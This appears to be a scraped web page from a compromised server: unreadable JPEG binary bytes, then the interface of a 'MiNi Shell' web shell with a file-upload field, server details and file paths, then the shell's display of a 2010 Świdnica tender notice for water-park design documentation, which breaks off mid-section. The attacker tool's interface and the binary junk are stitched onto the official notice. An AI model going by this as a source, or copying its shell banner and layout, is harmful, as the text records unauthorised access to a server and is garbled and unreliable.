JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100506/125360-N-2010.html

<p class="kh_header"><b>Świdnica: wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.:

 Budowa Parku Wodnego w Świdnicy zlokalizowanego w Świdnicy przy ul. Sportowej, dz. nr 23/1 i 23/2.</b><br>
<b>Numer ogłoszenia: 125360 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.:

 Budowa Parku Wodnego w Świdnicy zlokalizowanego w Świdnicy przy ul. Sportowej, dz. nr 23/1 i 23/2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lokalizacja
Zadanie obejmuje obszar (ok. 4,2 ha) na działkach:
nr 23/1 ; nr 23/2 ; nr 19; obręb 004 Śródmieście w Świdnicy, woj. Dolnośląskie.
Park Wodny  zlokalizowany będzie w sąsiedztwie istniejącego Ośrodka Sportu i Rekreacji w Świdnicy, na obszarze byłych ogrodów działkowych, tj. w śródmieściu Świdnicy między ulicami Spor-tową , Śląską i Bokserską.

4.3. Sposób władania nieruchomością:
1. Własność Gminy Miasto Świdnica; działka nr 23-1 i 23-2 obr. 4 Śródmieście.
2. w użytkowaniu wieczystym Gminy Miasto Świdnica, zarządzane przez Ref. Komunikacji Urzędu Miasta Świdnica; działka nr 19, obr.4  Śródmieście

4.4. Przedmiot i cel zamówienia;
Przedmiotem zamówienia jest opracowanie kompletnej i pełnobranżowej dokumentacji projektowej budowlano-wykonawczej, kosztorysowej wraz z  uzyskaniem wszelkich niezbędnych opinii, uzgodnień, pozwoleń, uzyskanie pozwoleń na budowę. Sporządzona dokumentacja winna umożliwić Zamawiającemu aplikowanie o dofinansowanie ze środków UE realizacji zadania pn.:Budowa Parku Wodnego w Świdnicy przy ul. Sportowej, dz. nr 23-1 i 23-2. Dokumentacja winna zawierać założenia koncepcji firmy GMF opracowanej w listopadzie 2009 roku na podstawie, której sformułowano zapisy punktu 4.4.1. 

4.4.1. Ogólna charakterystyka prac projektowanych:

4.4.1.1 Obszar basenów wewnętrznych i innych rozwiązań funkcjonalnych( patrz.str.39 oraz od str.  40 do str.53 koncepcja GMF).
4.4.1.1.a Obszar wewnętrzny
Obszar basenu sportowego

Niecka sportowa przystosowana do prowadzenia zawodów: 25 m x 16,66 m z 6 torami odpowiada 416,5 m2 powierzchni wody ze skocznią- trampoliną (1m deska- 3 m platforma). Głębokość wody wynosząca 1,80 m, dno ze spadkiem na min. 3,40 m w obrębie zagłębienia w obszarze skoków. Sześć bloków star-towych, 4 drabiny wejściowe i dodatkowo boczne wejście schodkowe do 1,35m. (Mobilna) trybuna na zawody. 

Niecka pływacka do kursów i nauki pływania. Podłoga podnoszona, zmiennie- ustawna od 0,4 m do 1,80 jedna głębokość, ok. 1.4m. Wielkość 8,0 m x 12,5 m odpowiada 100 m2 pow. wody; 2 drabiny do wchodzenia i dodatkowo zmiennie- ustawna schodkowa drabinka nożycowa.
Inne

Wystarczająca ilość obejść wokół niecek i możliwości pobytu, odpoczynku (np. ławki) dla grup 

Wystarczająca ilość miejsc do złożenia, przechowania rzeczy (np. toreb itp.) Niebezpośred-nie - nieoślepiające oświetlenie. Przyporządkowanie pomieszczenia gdzie przechowuje się sprzęt sportowy i środki czystości (w kombinacji z obszarem basenu rekreacyjnego). Pomieszczenie dla Pierwszej Pomocy (w kombinacji z obszarem basenu rekreacyjnego). Winda- podnośnik dla osób niepełnosprawnych. Kabina nadzoru (w kombinacji z obsza-rem basenu rekreacyjnego). Podział pod wzgl. pomieszczeń i akustyki obszaru basenu re-kreacyjnego.

Obszar rekreacji basenowej

Niecka rekreacyjna. Wielkość ok. 250 m2 w fantazyjnej formie. Głębokość wody od 0,90 m do 1,35 m
Schody wejściowe i drabinki. Połączenie z całoroczną niecką zewnętrzną śluza. Wyposażona w atrakcje, (leżaki) podwodne, wodospad, dysze masażu (wodą), prysznice dla pleców i karku, kanał ze strumie-niem- prądem wodnym itp.  

Niecka dla dzieci. Wielkość ok. 40 m2 w fantazyjnej formie Głębokość wody od 0,00 m do 0,40 m 
Dostosowane dla dzieci atrakcje takie jak kanał ze stateczków, grzybek wodny, źródło i działko wodne, figury do zabawy i statek zabaw. W obszarze przyległym znajdują się powierzchnie do siedzenia-spoczynku dla rodziców, obszar do przewijania dzieci z dostosowanymi dla dzieci sani-tariatami. 

Zjeżdżalnia. Zjeżdżalnia w kształcie kolistym- tor jak bobslejowy dla pojedynczych i podwójnych wagoników-sanek długości ok. 100 m. Niecka lądowania o powierzchni wody ok. 25 m2 . Wieża zjeżdżalni i niecka lądowania tworzą przestrzennie i akustycznie, niezależną część obszaru base-nu rekreacyjnego  (możliwość późniejszego poszerzenia- uzupełnienia). 

Gastronomia wewnętrzna (na obiekcie) 

    Ok. 60 miejsc siedzących . System Free-Flow. Połączenie z centralnym blokiem kuchennym. 


4.4.1.1.b Obszar zewnętrzny

Całoroczna niecka zewnętrzna. Wielkość ok. 200 m2 w formie fantazyjnej z obszarami zorientowanymi na wypoczynek i rozrywkę. Głębokość wody 1,35 m na całej powierzchni. Wyposażone w atrakcje ta-kie jak gejzery wodne na dnie, dysze masażu (wodnego), wodospad, kanał ze strumieniem-prądem wodnym itp. Połączenie do niecki rekreacyjnej wewnątrz (śluza).

Niecka dla dzieci. Wielkość ok. 40 m2 w fantazyjnej formie z żaglem słonecznym. Głębokość wody od 0,00 m do 0,40 m. Dostosowane dla dzieci atrakcje takie jak grzybek wodny, dysze- fontanny, działka wodne. Mocowane i nie- miejsca do leżenia, obszary gier-sportu. Prysznice zewnętrzne 
Inne

Wystarczająca ilość obejść wokół niecek i możliwości pobytu- odpoczynku. Wystarczająca ilość miejsc do złożenia przechowania rzeczy (np. toreb itp.) Oświetlenie naturalne. Podział pod wzgl. pomieszczeń i akustyki obszaru basenu sportowego. Atrakcyjne urządzenie wystrój ( wnętrz) 2 so-laria.
 Otwierana fasada i-lub pokrycie dachu czyni zbędnymi dalsze zewnętrzne powierzchnie wodne na obiekcie.

4.4.1.2.  Wieża do nurkowania

Inną możliwość atrakcji daje wieża do nurkowania na obiekcie.  Z powodu wysokości kosztów inwe-stycyjnych, niewielkiego proporcjonalnie stosunku kosztów do korzyści w przedsiębiorstwie obiekcie i niewielkiej ilości korzystających, tworzy to możliwą (do realizacji) w przyszłości jed-nakże nie wymagalną natychmiast atrakcję. Niezbędne powierzchnie i przyłącza dla rozbudowy powinny zostać ujęte w planowaniu. 

4.4.1.3.  Fitness

Studio fitnessu tworzy następną możliwą dodatkową atrakcję przy basenie rekreacyjnym.
4.4.1.4. Obszary sauna-spa

Krajobraz Saun z różnymi ofertami saun w obszarze wewnątrz i na zewnątrz jak również powierzch-niami wodnymi zewnętrznymi w użytkowaniu całorocznym, w tym: Sauna fińska  Sanarium, Kąpiel pa-rowa, Sauna aromatyczna. Niecka źródlana (zimna). Obszar uciech prysznicowych z niecką do całkowi-tego zanurzenia (2 m2). Pomieszczenia wyciszenia m.in.z kominkiem. Sauna-Vitalbar- (ożywczy) bar saunowy;  ok. 20 miejsc siedzących, obsługa-service, połączenie z centralnym blokiem kuchennym.

Tematycznie urządzony obszar zewnętrzny z miejscami leżącymi  i elementami stymulują-mi pobudzającymi stopy. Pawilon Saun w ogrodzie saunowym z sauną fińską i pokojem wyciszenia ; Sauna ziemna ; Prysznice zewnętrzne; Sole- niecka zewnętrzna (solankowa); Cały rok w użytkowaniu; Wielkość 20 m2; Głębokość wody 1,35 m. 

     Inne
      Wystarczająca ilość miejsc do złożenia, przechowania rzeczy (np. toreb itp.) Przyporządkowanie po-mieszczenia gdzie przechowuje się sprzęt sportowy i środki czystości (w kombinacji z obszarem basenu rekreacyjnego). Przyporządkowanie pomieszczenia gdzie znajduje się nadzorujący saunę magazyn skład środków czystości. 1 solarium.  Obszar spa w wysokiej klasy Ambiente dla zabiegów pojedynczych osób lub par wraz z indywidualną opieką, a w tym: 1 pomieszczenie do użytku dla par, 2 pomieszczenie do użytku dla pojedynczych osób, kąpiel rasul (rasul- błotne nacieranie ),obszary wyciszenia. Pomieszcze-nie magazynowe i na środki/czystości pomieszczenie dla personelu. Obszar poradnictwa oraz poczekal-nia. 


4.4.2  Dokumentacja Budowy Parku Wodnego składać się będzie z trzech oddzielnych i komplet-nych części odpowiadających zakładanym etapom prac:

Etap I - projekt budowlany i wykonawczy infrastruktury technicznej dotyczącej rozwiązań w zakresie dróg dojazdowych, rozwiązań komunikacyjnych w rejonie ulic Śląskiej, Bokserskiej oraz Sportowej wraz z uzgodnieniami i rozwiązaniami projektowymi. Projekt powinien przewidywać obsługę komuni-kacyjną uzgodnioną na podstawie decyzji lokalizacyjnej zjazdu  wydanej przez zarządcę drogi. Zama-wiający jest w posiadaniu projektu budowlanego zadania pn.  Przebudowa ul. Śląskiej w Świdnicy na odcinku od skrzyżowania z ul. Pionierów do mostu na potoku Witoszówka. Wykonawca zobowiązany jest nawiązać  do ww rozwiązania. Zakres ten winien obejmować w razie konieczności przyłączenie i przebudowę niezbędnych mediów; przyłączy wraz z ich rozwiązaniami projektowymi, wjazdami oraz przygotowaniem terenu i koniecznymi rozbiórkami. 

Etap II - projekt budowlany i wykonawczy architektoniczno-konstrukcyjny i instalacyjnych rozwiązań obiektów kubaturowych.

Etap III - projekt zagospodarowania terenu, obejmujący między innymi: parkingi, drogi wewnętrzne, niecki zewnętrzne, zieleń , boiska itp.

Dokumentacja dla każdego z ww etapów zostanie opracowana jako odrębna dokumentacja, ponadto do-kumentacje trzech etapów będą wzajemnie skoordynowane pod względem zastosowanych rozwiązań projektowych oraz czasowych i będą kompletne (dla każdego z etapów oraz jako całość składająca się z tych etapów) z punktu widzenia celu, któremu mają służyć. 

4.4.3. Przedmiot umowy obejmuje w szczególności :
      1. opracowanie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgodnie z ustawą z dnia   
       27.04.2001r. Prawo ochrony środowiska (Dz.U.08.25.150 z późn. zmianami) oraz ustawy z dnia 
       03.10.2008r. O udostępnieniu informacji o środowisku i jego ochronie, (Dz.U.08.199.1227),
      2. sporządzenie raportu o oddziaływaniu na środowisko przedmiotowego przedsięwzięcia, o ile  
        konieczność taka wynikać będzie z obowiązujących przepisów,
3. określenie zakresu niezbędnych badań geotechnicznych gruntu oraz zlecenie ich wykonania, 
4. opracowanie ostatecznych danych opisujących projektowane funkcje i etapy prac oraz oszaco-wanie kosztów ich realizacji na etapie przygotowywania przez Zamawiającego wniosku o dofinanso-wanie zadania ze środków Unii Europejskiej przed ostatecznym terminem zakończenia prac projekto-wych. Wykonawca zobowiązany będzie dostarczyć dane funkcjonalne i użytkowe wraz z zesta-wieniem kosztów inwestycji jako składnika wniosku aplikacyjnego w terminie do 45 dni od powia-domienia go przez Zamawiającego. 
5.  przygotowanie mapy do celów projektowych wraz z wypisem z rejestru gruntów, 
6. wykonanie uzgodnień lokalizacyjnych z właścicielami uzbrojenia terenu,
7. wystąpienie do dostawców mediów o zapewnienie i dostawy i uzyskanie warunków przyłączenia obiektu do wszystkich sieci zewnętrznych,
8. wykonanie dokumentacji projektowej zgodnie z warunkami Miejscowego Planu Zagospodarowania Przestrzennego dla terenu obejmującego planowaną inwestycję,
9. opracowanie projektu aranżacji i wyposażenia wnętrz budynków basenu i innych,

10. opracowanie programu prac archeologicznych ( w przypadku jego wymagalności),

11. opracowanie pełnobranżowego projektu budowlanego w zakresie uwzględniającym specyfikę ro-bót budowlanych dotyczących poszczególnych etapów robót (zgodnie z Rozporządzeniem Min. Infra-struktury z 03.07.2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120.1133 z późn. zmianami), oraz uzyskanie pozwolenia na budowę; w zakresie odpowied-nio:
- architektury, 
- konstrukcji,
- przygotowania terenu, rozbiórki, 
- wewnętrznych i zewnętrznych instalacji: wod.-kan., gaz, wentylacji i klimatyzacji, 
- wewnętrznych i zewnętrznych instalacji elektrycznych i teletechnicznych (w tym okablowanie struk-turalne, instalacja odgromowa; elektroniczna informacja dla korzystających z basenu, dodatkowych systemów wspomagających  w tym: 
-	system elektronicznej obsługi klienta, w tym system pobierania opłat,
-	system łączności (telefonia, internet),
-	system monitoringu obiektu(ochrona),
-	system monitoringu procesu uzdatniania wody,
-	system monitoringu pracy instalacji grzewczych i wentylacyjnych,
-	system nagłośnienia pływalni w części sportowej i rekreacyjnej, z naciskiem na jakość nagło-śnienia dla wykorzystania obiektu na prezentacje widowisk tzw. Światło- dźwięk, czas Rozchodzenia się pogłosu w granicach 1,5 sekundy itp.
-	system audiowizualny projekcji parametrów dotyczących temp. zewn. i wew. temp. wody. czasu itp z możliwością emitowania reklam w części sportowej i rekreacyjnej,
-	system audiowizualny dla zawodów sportowych w części sportowej pływalni 
-	itd),
- przyłączy; energetycznych, wod.-kan, gaz (ewentualna przebudowa przyłączy istniejących lub bu-dowa nowych),
- instalacji c.o. z lokalną kotłownią gazową lub wymiennikowni  przewiduje się ewentualność, że pompa ciepła będzie odbierała ciepło z wody produkowanej w ZUW na Bokserskiej wspomaganej instalacją solarną i pompami ciepła z obiegów wentylacji i odzysku ciepła z odprowadzenia ścieków ciepłej wody użytkowej. Wykonawca przedstawi Zamawiającemu odpowiednio wcześniej, bilans energetyczny dla projektowanego kompleksu, pozwalający na podjęcie przez Zamawiającego pisem-nej decyzji w zakresie wyboru źródeł uzyskania ciepła. 
- instalacji technologicznych uzdatniania wód basenowych wraz z systemem monitoringu parametrów i dozowania, 
- instalacji odprowadzenia wód deszczowych z obiektu wraz ze zbiornikiem wód opadowych umożli-wiających zasilanie spłuczek WC,
- wyposażenia sportowo-rekreacyjnego basenu oraz wyposażenie do obsługi i konserwacji pływalni i jej systemów, 
- sieci; kanalizacji deszczowej, elektrycznych (oświetlenie uliczne, sygnalizacja świetlna, monitoring) i teletechnicznych, 
- ewentualnej przebudowy i likwidacji kolizji sieci gazowej, wodociągowej, kanalizacji sanitarnej i deszczowej, ewentualnej przebudowy i likwidacji kolizji sieci energetycznych i telekomunikacyjnych,
- przebudowy lub budowy dróg i chodników,
- projektu zagospodarowania terenu dla poszczególnych etapów i planszy zbiorczej dla całego za-dania inwestycyjnego.
Projekt zagospodarowania terenu powinien zawierać aktualny, całościowy, kompleksowy sposób zago-spodarowania obejmujący wszystkie branże oraz elementy małej architektury z organizacją ruchu, oświetleniem terenu i sygnalizacją uliczną włącznie.
 12. opracowanie projektów wykonawczych dla poszczególnych etapów w zakresie j.w.
Projekty wykonawcze powinny uzupełniać i uszczegóławiać projekty budowlane w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę robót budowlanych i realizacji tych robót budowlanych (§5 i §11 Rozporzą-dzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy do-kumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz pro-gramu funkcjonalno - użytkowego (Dz.U.04.2072 z późn. zmianami)),
13) wykonanie projektu kolorystyki:
a) elewacji obiektów kubaturowych,
b) elementów zagospodarowania terenu - urządzeń małej architektury,
14. opracowanie projektu organizacji ruchu docelowego wraz z jego zatwierdzeniem przez właściwe organy, który poza dojazdami do obiektów i oznakowaniem ulic zawierać będzie część opisującą trasy komunikacyjne tak, by części Parku Wodnego były zintegrowane w sposób bezkolizyjny,
15. opracowanie projektu tymczasowej organizacji ruchu (z zatwierdzeniem jw.) na czas prowadzenia robót budowlanych, z częścią opisująca trasy na czas prowadzenia robót budowlanych - w ramach projektu organizacji budowy,
16. opracowanie operatu wodnoprawnego w przypadku jego wymagalności , 
17. sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia,
18. uzyskanie wszelkich niezbędnych zgód i pozwoleń a w szczególności decyzji:
a) o środowiskowych uwarunkowaniach ,
b) o pozwoleniu wodnoprawnym (w przypadku jego wymagalności),
c) o pozwoleniu na budowę,
19. opracowanie specyfikacji technicznych wykonania i odbioru robót zgodnie z §12, 13 i 14 Rozpo-rządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U.04.2072 z późn. zmianami),
20. opracowanie przedmiarów robót zgodnie z §6 -§10 ww Rozporządzenia Min. Infrastruktury,
21. sporządzenie kosztorysów inwestorskich szczegółowych w oparciu o metody określone w Rozpo-rządzeniu Min. Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U.04.130.1389 z późn. zmianami),
22. sporządzenie zbiorczego zestawienia kosztów dla poszczególnych etapów prac i całego przedsię-wzięcia,
23. sporządzenie innych dokumentów i opracowań, jeżeli Wykonawca uzna je za niezbędne albo są niezbędne dla kompletności i poprawności dokumentacji w świetle odrębnych przepisów (np. ewentu-alne uzupełniające inwentaryzacje do celów projektowych, sporządzenie ekspertyzy technicznej istniejących urządzeń i obiektów do celów projektowych, badania geotechniczne gruntu, inne badania jeśli ich potrzeba wyniknie z dokumentacji  uzgodnionej z innymi służbam itd.).
24. pełnienie nadzoru autorskiego w zakresie opisanym w art. 20 ust. l pkt 4) Prawa Budowlanego, 
25. pełnienie nadzoru autorskiego w zakresie podawania rozwiązań zamiennych lub uzupełniających;
- które stały się wymagalne w czasie realizacji robót budowlanych w wyniku zmiany norm i przepi-sów szczególnych w okresie od daty wydania pozwolenia na budowę do dnia realizacji tych robót, jeżeli od zastosowania tych norm lub przepisów uzależnione będzie uzyskanie decyzji o pozwoleniu na użytkowanie,
- które stały się konieczne ze względu na wystąpienie okoliczności, których nie można było przewi-dzieć; np. innych warunków gruntowo - wodnych w okresie realizacji robót w stosunku do wystę-pujących w okresie przeprowadzania badań geotechnicznych,itp.
26. wykonanie wizualizacji kompleksu obiektów wraz z etapowaniem,  ich prezentacją oraz przekazanie wizualizacji na nośniku elektronicznym.
     Do obowiązków Wykonawcy należą także inne prace niezbędne do kompleksowego wykonania całości zadania oraz wynikające z obowiązujących przepisów, w tym występowanie w imieniu Zamawiającego o uzgodnienia, zapewnienia, techniczne warunki przyłączenia. Zamawiający oczekuje aby obiekt speł-niał wymagania budynku energooszczędnego zachowanie parametrów ok.90 kwh-m2-rok, wysokiej ja-kości właściwości akustycznych czas rozchodzenia się pogłosu ok.1,5 s. Powyższe wymagania na każdym z etapów do uzgodnienia z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 1.b), pkt 5, 6 i 7 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.21.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferent pod rygorem nieważności oferty wnosi wadium w wysokości  40.000, - PLN (słownie: czter-dzieści tysięcy złotych).
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w :
pieniądzu, poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych. 
4. Zamawiający nie wyraża zgody na wniesienie wadium w formie czeku potwierdzonego oraz wekslach z poręczeniem wekslowym banku
5. Wykonawca sam wybiera formę wadium z zastrzeżeniem ust. 3 i ust.4.
6. W przypadku wyboru pieniężnej formy, wadium należy wpłacić na konto Gminy Miasto Świdnica w banku PKO S.A. I Oddz. w Świdnicy nr konta: 96 1240 1978 1111 0010 0166 5724; z adnotacją wadium Park Wodny. Za termin wniesienia wadium uznaje się datę wpływu na rachunek Za-mawiającego.
7. W przypadku wniesienia wadium w formie niepieniężnej należy je złożyć w kasie Urzędu Miasta Świdnica w pokoju Nr 19. Wymagana ważność tej formy wadium - 30 dni od daty otwarcia ofert.
8. Zamawiający zwróci wadium, w ciągu 3 dni od daty zgłoszenia pisemnego wniosku przez Wykonaw-cę:
1) który wycofał ofertę przed terminem składania ofert, 
2) który został wykluczony z postępowania, 
3) którego oferta została odrzucona (z zastrzeżeniem ust.11).
9. Zamawiający dokonuje niezwłocznie zwrotu wadium z chwilą:
1) upływu terminu związania ofertą,
2) zawarcia umowy,
3) unieważnienie przetargu.
10.Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiające-go, w przypadku gdy:
1) odmówi podpisania umowy na warunkach określonych w ofercie,
2) zawarcie umowy stało się niemożliwe z winy Wykonawcy,
3) nie wniesie wymaganego należytego zabezpieczenia umowy,
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie Zamawiającego o uzupełnienie oświadczeń, dokumentów, pełnomocnictw jak w punkcie 7.5.12 ni-niejszej SIWZ, nie złoży wymaganych dokumentów; chyba, że Wykonawca udowodni, że wynika to z przyczyn nie leżących po stronie Wykonawcy.
12. W przypadku przedłużenia okresu związania ofertą; terminu ważności wadium musi zostać odpo-wiednio przedłużony; zgodnie z art.85 ust.4. ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, je-żeli przepisy prawa nakładają obowiązek ich posiadania,
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale 7 i 8  specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
